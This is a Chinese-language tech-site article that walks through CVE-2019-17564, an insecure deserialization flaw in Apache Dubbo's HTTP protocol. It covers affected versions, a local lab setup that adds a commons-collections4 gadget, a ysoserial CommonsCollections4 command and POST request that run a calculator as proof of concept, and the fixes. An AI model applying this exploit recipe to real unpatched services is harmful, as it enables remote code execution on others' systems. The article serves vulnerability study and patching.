溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶(hù)服務(wù)條款》

如何分析Apache Dubbo反序列漏洞CVE-2019-17564

發(fā)布時(shí)間:2021-12-10 15:54:35 來(lái)源:億速云 閱讀:171 作者:柒染 欄目:大數(shù)據(jù)

如何分析Apache Dubbo反序列漏洞CVE-2019-17564,相信很多沒(méi)有經(jīng)驗(yàn)的人對(duì)此束手無(wú)策,為此本文總結(jié)了問(wèn)題出現(xiàn)的原因和解決方法,通過(guò)這篇文章希望你能解決這個(gè)問(wèn)題。

0x01 簡(jiǎn)介    

Apache Dubbo是一款高性能、輕量級(jí)的開(kāi)源Java RPC框架,它提供了三大核心能力:面向接口的遠(yuǎn)程方法調(diào)用,智能容錯(cuò)和負(fù)載均衡,以及服務(wù)自動(dòng)注冊(cè)和發(fā)現(xiàn)。


0x02 漏洞概述      
   

Apache Dubbo HTTP協(xié)議中的一個(gè)反序列化漏洞(CVE-2019-17564),該漏洞的主要原因在于當(dāng)Apache Dubbo啟用HTTP協(xié)議之后,Apache Dubbo對(duì)消息體處理不當(dāng)導(dǎo)致不安全反序列化,當(dāng)項(xiàng)目包中存在可用的gadgets時(shí)即可導(dǎo)致遠(yuǎn)程代碼執(zhí)行。


0x03 影響版本      
   
2.7.0 <= Apache Dubbo <= 2.7.4.1    
2.6.0 <= Apache Dubbo <= 2.6.7    
Apache Dubbo = 2.5.x          


0x04 環(huán)境搭建

1、因?yàn)閐ubbo的啟動(dòng)需要依賴(lài)zookeeper,所以先安裝zookeeper      
     
     
wget https://archive.apache.org/dist/zookeeper/zookeeper-3.4.10/zookeeper-3.4.10.tar.gz# 將conf目錄下的zoo_sample.cfg改名為zoo.cfgmv zoo_sample.cfg zoo.cfg# 進(jìn)入bin目錄啟動(dòng)zookeeper./zkServer.sh start
     


如何分析Apache Dubbo反序列漏洞CVE-2019-17564


2、從GIthub上獲取dubbo的項(xiàng)目,并修改pom.xml      


git clone https://github.com/apache/dubbo-samples# 進(jìn)入到dubbo-samples-http目錄中,修改pom.xmlvim pom.xml
     


將dubbo版本修改為有漏洞的版本      


如何分析Apache Dubbo反序列漏洞CVE-2019-17564


添加依賴(lài),導(dǎo)入一個(gè)可觸發(fā)的gadgets,這邊導(dǎo)入的是commons-collections4-4.0      


<dependency>        <groupId>org.apache.commons</groupId>        <artifactId>commons-collections4</artifactId>        <version>4.0</version>    </dependency>
     


如何分析Apache Dubbo反序列漏洞CVE-2019-17564


3、mvn構(gòu)建,啟動(dòng)dubbo      

     
將下載的源碼放入當(dāng)前目錄的src文件夾內(nèi)      
     
mvn clean packagemvn -Djava.net.preferIPv4Stack=true -Dexec.mainClass=org.apache.dubbo.samples.http.HttpProvider exec:java
     


如何分析Apache Dubbo反序列漏洞CVE-2019-17564


0x05 漏洞利用

POST /org.apache.dubbo.samples.http.api.DemoService HTTP/1.1Host: 127.0.0.1:8080
paylaod
     


這邊使用ysoserial生成paylaod

     
java -jar ysoserial-master-55f1e7c35c-1.jar CommonsCollections4 /System/Applications/Calculator.app/Contents/MacOS/Calculator > 1.ser
     


burp發(fā)包,彈出計(jì)算器


如何分析Apache Dubbo反序列漏洞CVE-2019-17564


0x06 修復(fù)方式

1.禁用HTTP協(xié)議      
2.及時(shí)升級(jí)到2.7.5及以上版本

看完上述內(nèi)容,你們掌握如何分析Apache Dubbo反序列漏洞CVE-2019-17564的方法了嗎?如果還想學(xué)到更多技能或想了解更多相關(guān)內(nèi)容,歡迎關(guān)注億速云行業(yè)資訊頻道,感謝各位的閱讀!

向AI問(wèn)一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI